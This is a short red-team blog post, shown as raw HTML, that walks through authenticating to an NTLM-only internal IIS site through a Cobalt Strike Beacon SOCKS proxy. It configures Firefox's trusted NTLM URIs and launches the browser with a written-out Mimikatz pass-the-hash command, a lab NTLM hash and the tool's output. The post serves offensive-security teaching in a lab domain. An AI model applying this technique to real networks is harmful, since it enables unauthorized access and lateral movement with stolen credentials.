<!doctype html>
<html lang="en-us">
  <head>
    <title>NTLM Authentication with Firefox &amp; FoxyProxy - Offensive Defence</title>
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.101.0" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://offensivedefence.co.uk/css/main.min.f90f5edd436ec7b74ad05479a05705770306911f721193e7845948fb07fe1335.css" />
    <script src="https://kit.fontawesome.com/89e1a73a2b.js" crossorigin="anonymous"></script>

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="NTLM Authentication with Firefox &amp; FoxyProxy"/>
<meta name="twitter:description" content="It&rsquo;s common for organisations to host internal web applications that are configured for single sign-on, backed by Active Directory. Even though Kerberos is becoming more common, NTLM is still more ubiquitous (especially for legacy apps). This short post will demonstate how to authenticate to a web app over a SOCKS proxy, using NTLM.
I&rsquo;m running the default IIS web page on a Windows Server. Under the Authentication settings, I&rsquo;ve disabled Anonymous Auth and only enabled the NTLM provider under Windows Auth."/>

    <meta property="og:title" content="NTLM Authentication with Firefox &amp; FoxyProxy" />
<meta property="og:description" content="It&rsquo;s common for organisations to host internal web applications that are configured for single sign-on, backed by Active Directory. Even though Kerberos is becoming more common, NTLM is still more ubiquitous (especially for legacy apps). This short post will demonstate how to authenticate to a web app over a SOCKS proxy, using NTLM.
I&rsquo;m running the default IIS web page on a Windows Server. Under the Authentication settings, I&rsquo;ve disabled Anonymous Auth and only enabled the NTLM provider under Windows Auth." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://offensivedefence.co.uk/posts/ntlm-auth-firefox/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-06-17T09:57:19+01:00" />
<meta property="article:modified_time" content="2022-06-17T09:57:19+01:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://offensivedefence.co.uk"><img class="app-header-avatar" src="/avatar.png" alt="John Doe" /></a>
      <h1>Offensive Defence</h1>
      <p>&#34;The hand which strikes also blocks.&#34;</p>

    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">NTLM Authentication with Firefox &amp; FoxyProxy</h1>
      <div class="post-meta">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-link">
  <path d="M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71"></path>
  <path d="M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71"></path>
</svg>
              <a class="tag" href="https://offensivedefence.co.uk/authors/rastamouse/">Rasta Mouse</a>
        
      
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Jun 17, 2022
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          2 min read
        </div></div>
    </header>
    <div class="post-content">
      <p>It&rsquo;s common for organisations to host internal web applications that are configured for single sign-on, backed by Active Directory.  Even though Kerberos is becoming more common, NTLM is still more ubiquitous (especially for legacy apps).  This short post will demonstate how to authenticate to a web app over a SOCKS proxy, using NTLM.</p>
<p>I&rsquo;m running the default IIS web page on a Windows Server.  Under the Authentication settings, I&rsquo;ve disabled Anonymous Auth and only enabled the NTLM provider under Windows Auth.</p>
<p><img src="/images/ntlm-auth/iis-auth-settings.png" alt="" title="IIS Authentication Settings"></p>
<p>As a member of the domain, we can see the IIS landing page.</p>
<p><img src="/images/ntlm-auth/domain-user.png" alt="" title="IIS Landing Page"></p>
<p>If we have a Beacon running as a domain user, we can start the SOCKS proxy and configure FoxyProxy to point to the IP/port of your Team Server.</p>
<pre tabindex="0"><code>beacon&gt; getuid
[*] You are DEV\rasta

beacon&gt; socks 1080
[+] started SOCKS4a server on: 1080
</code></pre><p><img src="/images/ntlm-auth/foxy-proxy.png" alt="" title="FoxyProxy"></p>
<p>As you can probably guess, we&rsquo;re unable to access the IIS landing page because we have no credentials.</p>
<p><img src="/images/ntlm-auth/unauthorized.png" alt="" title="IIS Unauthorized"></p>
<p>First, we need to modify one of the &ldquo;hidden&rdquo; Firefox preferences.  Enter <code>about:config</code> into the address bar and search for the <code>network.automatic-ntlm-auth.trusted-uris</code> preference item. Add the URL, <code>http://192.168.56.1</code> in my case and click the little tick button.  Then close Firefox.</p>
<p>To provide the credential material, we can launch Firefox using Mimikatz&rsquo; Pass-the-Hash capability (how you get the NTLM hash in the first place is of course up to you).</p>
<pre tabindex="0"><code>  .#####.   mimikatz 2.2.0 (x64) #19041 May 13 2022 10:13:10
 .## ^ ##.  &#34;A La Vie, A L&#39;Amour&#34; - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 &#39;## v ##&#39;       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  &#39;#####&#39;        &gt; https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege &#39;20&#39; OK

mimikatz # sekurlsa::pth /domain:dev.lab /user:rasta /rc4:FC525C9683E8FE067095BA2DDC971889 /run:&#34;C:\Program Files\Mozilla Firefox\firefox.exe&#34;
user    : rasta
domain  : dev.lab
program : C:\Program Files\Mozilla Firefox\firefox.exe
impers. : no
NTLM    : fc525c9683e8fe067095ba2ddc971889
  |  PID  24428
  |  TID  7744
  |  LSA Process is now R/W
  |  LUID 0 ; 1341041463 (00000000:4feeab37)
  \_ msv1_0   - data copy @ 0000029A8FDD0AC0 : OK !
  \_ kerberos - data copy @ 0000029A8FCC44A8
   \_ des_cbc_md4       -&gt; null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 0000029A8FDA7428 (32) -&gt; null
</code></pre><blockquote>
<p>It&rsquo;s also worth noting, that if the web app accepted plaintext domain creds, we could launch Firefox using <code>runas /netonly</code>.</p>
</blockquote>
<p>Navigating to the URL now gives us access.</p>
<p><img src="/images/ntlm-auth/authorized.png" alt="" title="IIS Authorized"></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
